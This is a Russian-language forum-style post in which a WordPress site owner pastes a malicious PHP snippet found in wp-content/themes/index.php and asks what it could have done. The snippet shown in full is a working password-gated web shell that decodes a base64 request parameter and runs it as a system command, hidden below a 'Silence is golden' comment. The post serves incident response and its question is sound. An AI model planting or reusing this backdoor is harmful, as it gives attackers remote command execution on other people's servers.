Сегодня обнаружил вот такую вот штуку на WordPress сайте:
Адрес файла: wp-content/themes/index.php
В файле был вот такой код:
<?php
// Silence is golden.
$s=explode(":","6732fc3453c34f00be5bffc4f0dc2bcbdb1fea50:plugin:_lg");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}
Первые две строки - это понятно. А вот последняя была аж на строке 140. И не понятно, что оно делает и куда оно могло пролезть.
Вредоносный код удалил, файл заменил на нормальный. Но чего теперь опасаться? Куда эта штука могла залезть и что там могла наделать?
Антивирусник хоста его обозвал как:
SL-PHP-EVAL_REQUEST-awgh.UNOFFICIAL FOUND